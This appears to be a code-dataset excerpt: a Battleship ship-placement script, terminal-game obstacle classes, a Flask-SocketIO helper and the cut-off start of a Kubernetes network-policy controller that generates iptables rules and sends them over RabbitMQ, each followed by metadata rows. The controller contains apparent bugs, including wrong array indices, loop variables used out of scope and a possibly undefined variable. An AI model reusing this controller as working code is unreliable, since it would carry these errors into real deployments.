r1 = random.randint(0, col_num-2)
r2 = random.randint(0, row_num-2)
if a == 1:
if map_list[r1][r2] == "@":
r1 = random.randint(0, col_num-2)
r2 = random.randint(0, row_num-2)
map_list[r1][r2] = "@"
map_list[r1][r2+1] = "@"
else:
map_list[r1][r2] = "@"
map_list[r1][r2+1] = "@"
else:
if map_list[r1][r2] == "@":
r1 = random.randint(0, col_num-2)
r2 = random.randint(0, row_num-2)
map_list[r1][r2] = "@"
map_list[r1+1][r2] = "@"
else:
map_list[r1][r2] = "@"
map_list[r1+1][r2] = "@"
def boat3(map_list):
a = random.randint(1, 2)
while True:
r1 = random.randint(0, col_num-3)
r2 = random.randint(0, row_num-3)
if a == 1:
if map_list[r1][r2] == "@":
pass
elif map_list[r1][r2+1] == "@":
pass
elif map_list[r1][r2+2] == "@":
pass
else:
map_list[r1][r2] = "@"
map_list[r1][r2+1] = "@"
map_list[r1][r2+2] = "@"
break
else:
if map_list[r1][r2] == "@":
pass
elif map_list[r1+1][r2] == "@":
pass
elif map_list[r1+2][r2] == "@":
pass
else:
map_list[r1][r2] = "@"
map_list[r1+1][r2] = "@"
map_list[r1+2][r2] = "@"
break
def boat4(map_list):
a = random.randint(1, 2)
while True:
r1 = random.randint(0, col_num-4)
r2 = random.randint(0, row_num-4)
if a == 1:
if map_list[r1][r2] == "@":
pass
elif map_list[r1][r2+1] == "@":
pass
elif map_list[r1][r2+2] == "@":
pass
elif map_list[r1][r2+3] == "@":
pass
else:
map_list[r1][r2] = "@"
map_list[r1][r2+1] = "@"
map_list[r1][r2+2] = "@"
map_list[r1][r2+3] = "@"
break
else:
if map_list[r1][r2] == "@":
pass
elif map_list[r1+1][r2] == "@":
pass
elif map_list[r1+2][r2] == "@":
pass
elif map_list[r1+3][r2] == "@":
pass
else:
map_list[r1][r2] = "@"
map_list[r1+1][r2] = "@"
map_list[r1+2][r2] = "@"
map_list[r1+3][r2] = "@"
break
def boat5(map_list):
a = random.randint(1, 2)
while True:
r1 = random.randint(0, col_num-5)
r2 = random.randint(0, row_num-5)
if a == 1:
if map_list[r1][r2] == "@":
pass
elif map_list[r1][r2+1] == "@":
pass
elif map_list[r1][r2+2] == "@":
pass
elif map_list[r1][r2+3] == "@":
pass
elif map_list[r1][r2+4] == "@":
pass
else:
map_list[r1][r2] = "@"
map_list[r1][r2+1] = "@"
map_list[r1][r2+2] = "@"
map_list[r1][r2+3] = "@"
map_list[r1][r2+4] = "@"
break
else:
if map_list[r1][r2] == "@":
pass
elif map_list[r1+1][r2] == "@":
pass
elif map_list[r1+2][r2] == "@":
pass
elif map_list[r1+3][r2] == "@":
pass
elif map_list[r1+4][r2] == "@":
pass
else:
map_list[r1][r2] = "@"
map_list[r1+1][r2] = "@"
map_list[r1+2][r2] = "@"
map_list[r1+3][r2] = "@"
map_list[r1+4][r2] = "@"
break
def ships():
boat2(map_list)
boat3(map_list)
boat3(map_list)
boat4(map_list)
boat5(map_list)
with open(r"table2.csv", "w") as a:
writer = csv.writer(a)
for i in map_list:
writer.writerow(i)
with open(r"table.csv", "w") as a:
writer = csv.writer(a)
for i in map_list:
if "@" in i:
k = ""
for j in i:
if j == "@":
k = k + "🚢"
else:
k = k + "🌊"
writer.writerow(k)
else:
writer.writerow("🌊" * col_num)
b = ""
with open('table.csv', newline='') as csvfile:
a = csv.reader(csvfile)
for row in a:
b = b + ' '.join(row)
b = b + "\n"
return b
| 23.237288
| 64
| 0.463409
| 616
| 4,113
| 2.956169
| 0.099026
| 0.272927
| 0.286656
| 0.229544
| 0.78693
| 0.755629
| 0.704009
| 0.691378
| 0.689182
| 0.687534
| 0
| 0.08269
| 0.338439
| 4,113
| 177
| 65
| 23.237288
| 0.585447
| 0.004376
| 0
| 0.742331
| 0
| 0
| 0.023449
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03681
| false
| 0.147239
| 0.01227
| 0.006135
| 0.06135
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
2ccdc0a3b62091900d2e0c6ef345b670ebeb1ac6
| 8,938
|
py
|
Python
|
codes/obstacle.py
|
veeral-agarwal/DASSignment4
|
200c5ee5059fc42f4801ffdbca842a4fa0d5e9cd
|
[
"MIT"
] | null | null | null |
codes/obstacle.py
|
veeral-agarwal/DASSignment4
|
200c5ee5059fc42f4801ffdbca842a4fa0d5e9cd
|
[
"MIT"
] | null | null | null |
codes/obstacle.py
|
veeral-agarwal/DASSignment4
|
200c5ee5059fc42f4801ffdbca842a4fa0d5e9cd
|
[
"MIT"
] | null | null | null |
import random
import colorama as col
import numpy as np
dimx = 10000
dimy = 62
col.init()
class obstacle:
def __init__(self,x,y):
self.__penalty=10
self.__score = 15
self.__shape = []
self.__hit = False
self.__x = x
self.__y = y
def destroy(self):
self.__hit = True
self.__shape=[]
class zapper_horizontal(obstacle):
def __init__(self,x,y):
super().__init__(x,y)
self.__shape=[col.Fore.WHITE+"-"+col.Fore.RESET,col.Fore.RED+"-"+col.Fore.RESET,
col.Fore.RED+"-"+col.Fore.RESET,col.Fore.RED+"-"+col.Fore.RESET,col.Fore.RED+"-"+col.Fore.RESET
,col.Fore.RED+"-"+col.Fore.RESET,col.Fore.RED+"-"+col.Fore.RESET,col.Fore.RED+"-"+col.Fore.RESET,
col.Fore.RED+"-"+col.Fore.RESET,col.Fore.RED+"-"+col.Fore.RESET,col.Fore.RED+"-"+col.Fore.RESET,
col.Fore.RED+"-"+col.Fore.RESET,col.Fore.RED+"-"+col.Fore.RESET,col.Fore.RED+"-"+col.Fore.RESET
,col.Fore.WHITE+"-"+col.Fore.RESET]
self.__x = x
self.__y = y
def place(self):
x = self.__x
y = self.__y
shape = self.__shape
tempx=-1
for i in shape:
tempx+=1
print("\033["+str(y)+";"+str(x+tempx)+"H",end="")
print(i,end="")
print("\033["+str(dimy)+";1H")
def remove(self):
x = self.__x
y = self.__y
shape = self.__shape
tempx=-1
for i in shape:
tempx+=1
print("\033["+str(y)+";"+str(x+tempx)+"H",end="")
print(" ",end="")
print("\033["+str(dimy)+";1H")
def update(self,check=1):
if(self.__x>2):
self.__x-=check
else:
return True
def position(self):
coordinates = [self.__x,self.__y]
return coordinates
class zapper_verticle(obstacle):
def __init__(self,x,y):
super().__init__(x,y)
self.__shape=[col.Fore.WHITE+"|"+col.Fore.RESET,col.Fore.RED+"|"+col.Fore.RESET,
col.Fore.RED+"|"+col.Fore.RESET,col.Fore.RED+"|"+col.Fore.RESET,col.Fore.RED+"|"+col.Fore.
RESET,col.Fore.RED+"|"+col.Fore.RESET,col.Fore.RED+"|"+col.Fore.RESET,
col.Fore.RED+"|"+col.Fore.RESET,col.Fore.WHITE+"|"+col.Fore.RESET]
self.__x = x
self.__y = y
def place(self):
x = self.__x
y = self.__y
shape = self.__shape
tempx=-1
for i in shape:
tempx+=1
print("\033["+str(y+tempx)+";"+str(x)+"H",end="")
print(i,end="")
print("\033["+str(dimy)+";1H")
def remove(self):
x = self.__x
y = self.__y
shape = self.__shape
tempx=-1
for i in shape:
tempx+=1
print("\033["+str(y+tempx)+";"+str(x)+"H",end="")
print(" ",end="")
print("\033["+str(dimy)+";1H")
def update(self,check=1):
if(self.__x>2):
self.__x-=check
else:
return True
def position(self):
coordinates = [self.__x,self.__y]
return coordinates
class zapper_cross(obstacle):
def __init__(self,x,y):
super().__init__(x,y)
self.__shape=[col.Fore.WHITE+"\\"+col.Fore.RESET,col.Fore.RED+"\\"+col.Fore.RESET,
col.Fore.RED+"\\"+col.Fore.RESET,col.Fore.RED+"\\"+col.Fore.RESET,
col.Fore.RED+"\\"+col.Fore.RESET,col.Fore.WHITE+"\\"+col.Fore.RESET]
self.__x = x
self.__y = y
def place(self):
x = self.__x
y = self.__y
shape = self.__shape
temp=-1
for i in shape:
temp+=1
print("\033["+str(y+temp)+";"+str(x+temp)+"H",end="")
print(i,end="")
print("\033["+str(dimy)+";1H")
def remove(self):
x = self.__x
y = self.__y
shape = self.__shape
temp=-1
for i in shape:
temp+=1
print("\033["+str(y+temp)+";"+str(x+temp)+"H",end="")
print(" ",end="")
print("\033["+str(dimy)+";1H")
def update(self,check=1):
if(self.__x>2):
self.__x -=check
else:
return True
def position(self):
coordinates = [self.__x,self.__y]
return coordinates
class magnet(obstacle):
def __init__(self,x,y):
super().__init__(x,y)
self.__shape=[col.Fore.WHITE+"|"+col.Fore.RESET,col.Fore.WHITE+"|"+col.Fore.RESET,
col.Fore.LIGHTWHITE_EX+"="+col.Fore.WHITE,col.Fore.RED+"M"+col.Fore.RED,
col.Fore.LIGHTWHITE_EX+"="+col.Fore.WHITE,col.Fore.WHITE+"|"+col.Fore.RESET,
col.Fore.WHITE+"|"+col.Fore.RESET]
self.__x = x
self.__y = y
def place(self):
x = self.__x
y = self.__y
shape = self.__shape
tempx=-1
for i in shape:
tempx+=1
print("\033["+str(y)+";"+str(x+tempx)+"H",end="")
print(i,end="")
print("\033["+str(dimy)+";1H")
def remove(self):
x = self.__x
y = self.__y
shape = self.__shape
tempx=-1
for i in shape:
tempx+=1
print("\033["+str(y)+";"+str(x+tempx)+"H",end="")
print(" ",end="")
print("\033["+str(dimy)+";1H")
def update(self,check =1):
if(self.__x>2):
self.__x -=check
else:
return True
def position(self):
coordinates = [self.__x,self.__y]
return coordinates
class boss(obstacle):
def __init__(self,x,y):
super().__init__(x,y)
shape=[]
coord = []
with open("./drag") as obj:
i=0
for line in obj:
for j in range(len(line)):
if line[j] != ' ':
shape.append(line[j])
coord.append([i+x,j+y])
i+=1
self.__shape = shape
self.__coord = np.array(coord)
self.__x = x
self.__y = y
self.__lives = 9
def place(self):
x = self.__x
y = self.__y
shape = self.__shape
coord = self.__coord
tempx=-1
for i in shape:
tempx+=1
print("\033["+str(coord[tempx][0])+";"+str(coord[tempx][1])+"H",end="")
print(i,end="")
print("\033["+str(dimy)+";1H")
def remove(self):
x = self.__x
y = self.__y
shape = self.__shape
coord = self.__coord
tempx=-1
for i in shape:
tempx+=1
print("\033["+str(coord[tempx][0])+";"+str(coord[tempx][1])+"H",end="")
print(" ",end="")
print("\033["+str(dimy)+";1H")
def update(self,coordinates):
coord = self.__coord
if(coordinates[1]-coord[0][0]==11):
return True
elif (coordinates[1]-coord[0][0]<11):
if self.__coord[0,0]>3:
self.__coord[:,0]=self.__coord[:,0]-1
return True
elif (coordinates[1]-coord[0][0]>-11):
if self.__coord[0,0]<46:
self.__coord[:,0]=self.__coord[:,0]+1
return True
return True
def position(self):
coordinates = [self.__x,self.__y]
return coordinates
def lives(self):
if self.__lives>=0:
shape = ["B","O","S","S"," ",":"," ",str(self.__lives)]
tempx=-1
for i in shape:
tempx+=1
print("\033["+str(1)+";"+str(80+tempx)+"H",end="")
print(i,end="")
print("\033["+str(dimy)+";1H")
else:
shape = [" "," "," "," "," "," "," "," "," "," "," "]
tempx=-1
for i in shape:
tempx+=1
print("\033["+str(1)+";"+str(80+tempx)+"H",end="")
print(i,end="")
print("\033["+str(dimy)+";1H")
def shot(self):
self.__lives-=1
def dead(self):
if self.__lives<=0:
return True
return False
class ball(obstacle):
def __init__(self,x,y):
self.__x = x
self.__y = y
self.__shape = ["<","="]
def place(self):
x = self.__x
y = self.__y
shape = self.__shape
tempx=-1
for i in shape:
tempx+=1
print("\033["+str(y)+";"+str(x+tempx)+"H",end="")
print(i,end="")
print("\033["+str(dimy)+";1H")
def remove(self):
x = self.__x
y = self.__y
shape = self.__shape
tempx=-1
for i in shape:
tempx+=1
print("\033["+str(y)+";"+str(x+tempx)+"H",end="")
print(" ",end="")
print("\033["+str(dimy)+";1H")
def update(self,check = 1):
if(self.__x>2):
self.__x-=check
else:
return True
def position(self):
coordinates = [self.__x,self.__y]
return coordinates
| 31.583039
| 105
| 0.479078
| 1,168
| 8,938
| 3.451199
| 0.075342
| 0.128504
| 0.101216
| 0.111635
| 0.886877
| 0.876457
| 0.871248
| 0.848177
| 0.848177
| 0.818159
| 0
| 0.032025
| 0.332737
| 8,938
| 283
| 106
| 31.583039
| 0.643863
| 0
| 0
| 0.769784
| 0
| 0
| 0.031995
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125899
| false
| 0
| 0.010791
| 0
| 0.223022
| 0.151079
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
391b112fa6767a2ccb2a9eba4139c6c272d19f36
| 145
|
py
|
Python
|
backend/workers/socket.py
|
Techyhans/coco-annotator
|
e4ceaa551ce6397d33ab6602b08db32c855ebbfd
|
[
"MIT"
] | 1,584
|
2018-09-03T21:40:32.000Z
|
2022-03-24T23:43:28.000Z
|
backend/workers/socket.py
|
kaankrblt1/coco-annotator-tests
|
55ad0d08b2bc0f616357ec0001c5c6d5e0d4e2ae
|
[
"MIT"
] | 458
|
2018-09-04T03:15:00.000Z
|
2022-03-31T11:53:37.000Z
|
backend/workers/socket.py
|
kaankrblt1/coco-annotator-tests
|
55ad0d08b2bc0f616357ec0001c5c6d5e0d4e2ae
|
[
"MIT"
] | 415
|
2018-10-13T12:34:40.000Z
|
2022-03-28T14:57:07.000Z
|
from config import Config
from flask_socketio import SocketIO
def create_socket():
return SocketIO(message_queue=Config.CELERY_BROKER_URL)
| 20.714286
| 59
| 0.827586
| 20
| 145
| 5.75
| 0.7
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.124138
| 145
| 6
| 60
| 24.166667
| 0.905512
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
39223879616bbfeeb23aeebf0017da2809527cdd
| 36,036
|
py
|
Python
|
network_policy_controller.py
|
rushabh268/kubernetes-network-policy-controller
|
6c3b6c8565a5e5459f1e92fdac754cccf3b98176
|
[
"Apache-2.0"
] | 2
|
2018-01-24T21:31:31.000Z
|
2018-03-20T20:19:23.000Z
|
network_policy_controller.py
|
rushabh268/kubernetes-network-policy-controller
|
6c3b6c8565a5e5459f1e92fdac754cccf3b98176
|
[
"Apache-2.0"
] | null | null | null |
network_policy_controller.py
|
rushabh268/kubernetes-network-policy-controller
|
6c3b6c8565a5e5459f1e92fdac754cccf3b98176
|
[
"Apache-2.0"
] | 2
|
2021-06-06T13:13:27.000Z
|
2021-06-16T16:32:19.000Z
|
from kubernetes import client, config, watch
import kubernetes
import time
from tornado.ioloop import IOLoop
from tornado import gen
import pika
import sys
def send_policy_to_node(node_name, iptables):
#To-Do: Add check for rabbitmq status before sending the message
connection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))
channel = connection.channel()
channel.exchange_declare(exchange='topic_logs', exchange_type='topic')
routing_key = node_name if node_name != None else 'iptables.info'
message = ''.join(iptables) or 'No action!'
channel.basic_publish(exchange='topic_logs', routing_key=routing_key, body=message)
print(" [x] Sent %r:%r" % (routing_key, message))
connection.close()
def create_new_policy_rules(network_policy, uid, callback):
print 'Checking policy contents to add iptables based rules'
policy_info = {}
if 'metadata' in network_policy[uid]:
if 'namespace' in network_policy[uid]['metadata']:
policy_info['namespace'] = network_policy[uid]['metadata']['namespace']
#Determing default deny or default allow policies for Ingress and Egress
if network_policy[uid]['spec']['podSelector'] != {}:
if 'policyTypes' in network_policy[uid]['spec']:
if len(network_policy[uid]['spec']['policyTypes']) == 2:
if network_policy[uid]['spec']['policyTypes'] == ['Ingress', 'Egress']:
if 'podSelector' in network_policy[uid]['spec']:
if network_policy[uid]['spec']['podSelector'] == {}:
policy_info['policy_type'] = 'default_deny_for_ingress_and_egress'
else:
policy_info['policy_type'] = 'network_policy'
elif len(network_policy[uid]['spec']['policyTypes']) == 1:
if network_policy[uid]['spec']['policyTypes'] == 'Ingress':
if 'podSelector' in network_policy[uid]['spec']:
if network_policy[uid]['spec']['podSelector'] == {}:
policy_info['policy_type'] = 'default_deny_for_ingress'
else:
policy_info['policy_type'] = 'network_policy'
elif network_policy[uid]['spec']['policyTypes'] == 'Egress':
if 'podSelector' in network_policy[uid]['spec']:
if network_policy[uid]['spec']['podSelector'] == {}:
policy_info['policy_type'] = 'default_deny_for_egress'
else:
policy_info['policy_type'] = 'network_policy'
else:
if 'ingress' in network_policy[uid]['spec']:
if network_policy[uid]['spec']['ingress'] == [{}]:
if network_policy[uid]['spec']['podSelector'] == {}:
policy_info['policy_type'] = 'default_allow_for_ingress'
elif 'egress' in network_policy[uid]['spec']:
if network_policy[uid]['spec']['egress'] == [{}]:
if network_policy[uid]['spec']['podSelector'] == {}:
policy_info['policy_type'] = 'default_allow_for_egress'
elif len(network_policy[uid]['spec']['policyTypes']) == 1:
if network_policy[uid]['spec']['policyTypes'] == ['Ingress']:
if 'podSelector' in network_policy[uid]['spec']:
if network_policy[uid]['spec']['podSelector'] == {}:
policy_info['policy_type'] = 'default_deny_for_ingress'
else:
policy_info['policy_type'] = 'network_policy'
elif network_policy[uid]['spec']['policyTypes'] == ['Egress']:
if 'podSelector' in network_policy[uid]['spec']:
if network_policy[uid]['spec']['podSelector'] == {}:
policy_info['policy_type'] = 'default_deny_for_egress'
else:
policy_info['policy_type'] = 'network_policy'
elif len(network_policy[uid]['spec']['policyTypes']) == 2:
if network_policy[uid]['spec']['policyTypes'] == ['Ingress', 'Egress']:
if 'podSelector' in network_policy[uid]['spec']:
if network_policy[uid]['spec']['podSelector'] == {}:
policy_info['policy_type'] = 'default_deny_for_ingress_and_egress'
else:
policy_info['policy_type'] = 'network_policy'
#Parse Network policy ports and labels
if policy_info['policy_type'] == 'network_policy':
ingress_egress_info = get_ingress_egress_policy_info(network_policy, uid)
if 'podSelector' in network_policy[uid]['spec']:
if 'matchLabels' in network_policy[uid]['spec']['podSelector']:
policy_info['pod_selector_labels'] = network_policy[uid]['spec']['podSelector']['matchLabels']
policy_list = {}
policy_list_ingress = {}
policy_list_egress = {}
if policy_info['policy_type'] == 'network_policy':
print "Network policy has both ingress and egress"
policy_list_ingress = create_ingress_iptable_rules(ingress_egress_info['ingress'], policy_info)
policy_list_egress = create_egress_iptable_rules(ingress_egress_info['egress'], policy_info)
elif policy_info['policy_type'] == 'default_allow_for_ingress':
print "Network policy is default allow for Ingress"
policy_list = create_default_allow_iptable_rules(policy_info['policy_type'], policy_info['namespace'])
elif policy_info['policy_type'] == 'default_allow_for_egress':
print "network policy is default allow for egress"
policy_list = create_default_allow_iptable_rules(policy_info['policy_type'], policy_info['namespace'])
elif policy_info['policy_type'] == 'default_deny_for_ingress':
policy_list = create_default_deny_iptable_rules(policy_info['policy_type'], policy_info['namespace'])
elif policy_info['policy_type'] == 'default_deny_for_egress':
policy_list = create_default_deny_iptable_rules(policy_info['policy_type'], policy_info['namespace'])
elif policy_info['policy_type'] == 'default_deny_for_ingress_and_egress':
policy_list = create_default_ingress_egress_deny_iptable_rules(policy_info['policy_type'], policy_info['namespace'])
#print policy_list
callback(policy_list)
def create_ingress_iptable_rules(ingress_info, policy_info):
print ingress_info, policy_info
policy_list = {}
pod_arr = []
if policy_info['policy_type'] == 'network_policy':
if 'pod_labels' in ingress_info:
if 'namespace' in policy_info:
if policy_info['namespace'] != ' ':
pod_arr = get_ingress_nodes_of_pods_pod_selector(policy_info['namespace'], ingress_info['pod_labels'])
dest_pod_arr = []
if policy_info['policy_type'] == 'network_policy':
if 'pod_selector_labels' in policy_info:
if 'namespace' in policy_info:
if policy_info['namespace'] != ' ':
dest_pod_arr = get_ingress_nodes_of_pods_pod_selector(policy_info['namespace'], policy_info['pod_selector_labels'])
namespace_pod_arr = []
if 'namespace_labels' in ingress_info:
namespace_pod_arr = get_ingress_nodes_of_pods_namespace_selector(ingress_info['namespace_labels'])
print pod_arr, dest_pod_arr, namespace_pod_arr
if pod_arr != []:
if dest_pod_arr != []:
for policy_pod in xrange(len(dest_pod_arr)):
#Delete any existing rule
#iptables -A FORWARD -m comment --comment "network policy chain for POD podname " -d <podIP> -j KUBE-NWPLCY-podnamehash
policy_del = 'iptables -D FORWARD -d '+pod_arr[policy_pod]['pod_ip']+' -m comment --comment \" network policy chain for POD '+ dest_pod_arr[policy_pod]['pod_name'] + '\" -j KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:]
send_policy_to_node(dest_pod_arr[policy_pod]['node_name'], policy_del)
time.sleep(1)
print policy_del
#Optionally add a per policy forwarding chain as follows
#-A KUBE-NWPLCY-7UYHFX -m comment --comment "network policy rule for pod redis-slave-132015689-fksjt;policy: guestbook-network-policy" -j KUBE-NWPLCY-7UYHFX-SYJW74
#Add the new rule now
policy = 'iptables -N' + ' KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:]
send_policy_to_node(dest_pod_arr[policy_pod]['node_name'], policy)
time.sleep(1)
policy = 'iptables -A FORWARD -d '+pod_arr[policy_pod]['pod_ip']+' -m comment --comment \" network policy chain for POD '+ dest_pod_arr[policy_pod]['pod_name'] + '\" -j KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:]
send_policy_to_node(dest_pod_arr[policy_pod]['node_name'], policy)
time.sleep(1)
if dest_pod_arr[policy_pod]['node_name'] in policy_list:
policy_list[dest_pod_arr[policy_pod]['node_name']].append(policy_del)
else:
policy_list[dest_pod_arr[policy_pod]['node_name']] = []
policy_list[dest_pod_arr[policy_pod]['node_name']].append(policy_del)
for pod in xrange(len(pod_arr)):
#-A KUBE-NWPLCY-7UYHFX -s 10.244.3.4/32 -p tcp -m tcp --dport 6379 -m comment --comment "nw policy rule for peer POD frontend-88237173-zir4y" -j ACCEPT
#Delete any existing rule
#assuming only one pair of port and protocol for now
if 'ingress_ports' in ingress_info:
policy_del = 'iptables -D KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:] + ' -s '+pod_arr[pod]['pod_ip']+' -p ' +str(ingress_info['ingress_ports'][0]['protocol'].lower())+ ' -m '+str(ingress_info['ingress_ports'][0]['protocol'].lower())+ ' --dport ' + str(ingress_info['ingress_ports'][0]['port'])+ ' -m comment --comment \"network policy for POD '+ dest_pod_arr[policy_pod]['pod_name'] + ' from pod' + pod_arr[pod]['pod_name'] + '\" -j ACCEPT'
else:
policy_del = 'iptables -D KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:] + ' -s '+pod_arr[pod]['pod_ip']+' -m comment --comment \"network policy for POD '+ dest_pod_arr[policy_pod]['pod_name'] + ' from pod' + pod_arr[pod]['pod_name'] + '\" -j ACCEPT'
send_policy_to_node(pod_arr[pod]['node_name'], policy_del)
time.sleep(1)
#Add the new rule now
if 'ingress_ports' in ingress_info:
policy = 'iptables -A KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:] + ' -s '+pod_arr[pod]['pod_ip']+' -p ' +str(ingress_info['ingress_ports'][0]['protocol'].lower())+ ' -m '+str(ingress_info['ingress_ports'][0]['protocol'].lower())+ ' --dport ' + str(ingress_info['ingress_ports'][0]['port'])+ ' -m comment --comment \"network policy for POD '+ dest_pod_arr[policy_pod]['pod_name'] + ' from pod' + pod_arr[pod]['pod_name'] + '\" -j ACCEPT'
else:
policy = 'iptables -A KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:] + ' -s '+pod_arr[pod]['pod_ip']+' -m comment --comment \"network policy for POD '+ dest_pod_arr[policy_pod]['pod_name'] + ' from pod' + pod_arr[pod]['pod_name'] + '\" -j ACCEPT'
send_policy_to_node(dest_pod_arr[pod]['node_name'], policy)
time.sleep(1)
if dest_pod_arr[pod]['node_name'] in policy_list:
policy_list[dest_pod_arr[pod]['node_name']].append(policy_del)
else:
policy_list[dest_pod_arr[pod]['node_name']] = []
policy_list[dest_pod_arr[pod]['node_name']].append(policy_del)
if pod_arr != []:
if namespace_pod_arr != []:
for policy_pod in xrange(len(dest_pod_arr)):
#-A KUBE-NWPLCY-7UYHFX -s 10.244.3.4/32 -p tcp -m tcp --dport 6379 -m comment --comment "nw policy rule for peer POD frontend-88237173-zir4y" -j ACCEPT
#Delete any existing rule
#assuming only one pair of port and protocol for now
if 'ingress_ports' in ingress_info:
policy_del = 'iptables -D KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:] + ' -s '+namespace_pod_arr[pod]['pod_ip']+' -p ' +str(ingress_info['ingress_ports'][0]['protocol'].lower())+ ' -m '+str(ingress_info['ingress_ports'][0]['protocol'].lower())+ ' --dport ' + str(ingress_info['ingress_ports'][0]['port'])+ ' -m comment --comment \"network policy for POD '+ dest_pod_arr[policy_pod]['pod_name'] + ' from pod' + namespace_pod_arr[pod]['pod_name'] + '\" -j ACCEPT'
else:
policy_del = 'iptables -D KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:] + ' -s '+namespace_pod_arr[pod]['pod_ip']+' -m comment --comment \"network policy for POD '+ dest_pod_arr[policy_pod]['pod_name'] + ' from pod' + namespace_pod_arr[pod]['pod_name'] + '\" -j ACCEPT'
send_policy_to_node(dest_pod_arr[pod]['node_name'], policy_del)
time.sleep(1)
#Add the new rule now
if 'ingress_ports' in ingress_info:
policy = 'iptables -A KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:] + ' -s '+namespace_pod_arr[pod]['pod_ip']+' -p ' +str(ingress_info['ingress_ports'][0]['protocol'].lower())+ ' -m '+str(ingress_info['ingress_ports'][0]['protocol'].lower())+ ' --dport ' + str(ingress_info['ingress_ports'][0]['port'])+ ' -m comment --comment \"network policy for POD '+ dest_pod_arr[policy_pod]['pod_name'] + ' from pod' + namespace_pod_arr[pod]['pod_name'] + '\" -j ACCEPT'
else:
policy = 'iptables -A KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:] + ' -s '+namespace_pod_arr[pod]['pod_ip']+' -m comment --comment \"network policy for POD '+ dest_pod_arr[policy_pod]['pod_name'] + ' from pod ' + namespace_pod_arr[pod]['pod_name'] + '\" -j ACCEPT'
send_policy_to_node(dest_pod_arr[pod]['node_name'], policy)
time.sleep(1)
if dest_pod_arr[pod]['node_name'] in policy_list:
policy_list[dest_pod_arr[pod]['node_name']].append(policy_del)
else:
policy_list[dest_pod_arr[pod]['node_name']] = []
policy_list[dest_pod_arr[pod]['node_name']].append(policy_del)
if dest_pod_arr != []:
if 'from_ip_block_cidr' in ingress_info:
for pod in xrange(len(dest_pod_arr)):
#-A KUBE-NWPLCY-7UYHFX -s 10.244.3.4/32 -p tcp -m tcp --dport 6379 -m comment --comment "nw policy rule for peer POD frontend-88237173-zir4y" -j ACCEPT
#Delete any existing rule
#assuming only one pair of port and protocol for now
if 'ingress_ports' in ingress_info:
policy_del = 'iptables -D KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:] + ' -s '+ingress_info['from_ip_block_cidr']+' -p ' +str(ingress_info['ingress_ports'][0]['protocol'].lower())+ ' -m '+str(ingress_info['ingress_ports'][0]['protocol'].lower())+ ' --dport ' + str(ingress_info['ingress_ports'][0]['port'])+ ' -m comment --comment \"network policy for POD '+ dest_pod_arr[policy_pod]['pod_name'] + ' from' + ingress_info['from_ip_block_cidr'] + '\" -j ACCEPT'
if 'except_ip_cidrs' in ingress_info:
policy_del_two = 'iptables -D KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:] + ' -s '+ingress_info['except_ip_cidrs'][0]+' -p ' +str(ingress_info['ingress_ports'][0]['protocol'].lower())+ ' -m '+str(ingress_info['ingress_ports'][0]['protocol'].lower())+ ' --dport ' + str(ingress_info['ingress_ports'][0]['port'])+ ' -m comment --comment \"network policy for POD '+ dest_pod_arr[policy_pod]['pod_name'] + ' from' + ingress_info['except_ip_cidrs'][0] + '\" -j DROP'
else:
policy_del = 'iptables -D KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:] + ' -s '+namespace_pod_arr[pod]['pod_ip']+' -m comment --comment \"network policy for POD '+ dest_pod_arr[policy_pod]['pod_name'] + ' from pod' + namespace_pod_arr[pod]['pod_name'] + '\" -j ACCEPT'
if 'except_ip_cidrs' in ingress_info:
policy_del_two = 'iptables -D KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:] + ' -s '+ingress_info['except_ip_cidrs'][0]+' -m comment --comment \"network policy for POD '+ dest_pod_arr[policy_pod]['pod_name'] + ' from' + ingress_info['except_ip_cidrs'][0] + '\" -j DROP'
send_policy_to_node(dest_pod_arr[pod]['node_name'], policy_del)
time.sleep(1)
send_policy_to_node(dest_pod_arr[pod]['node_name'], policy_del_two)
time.sleep(1)
if 'ingress_ports' in ingress_info:
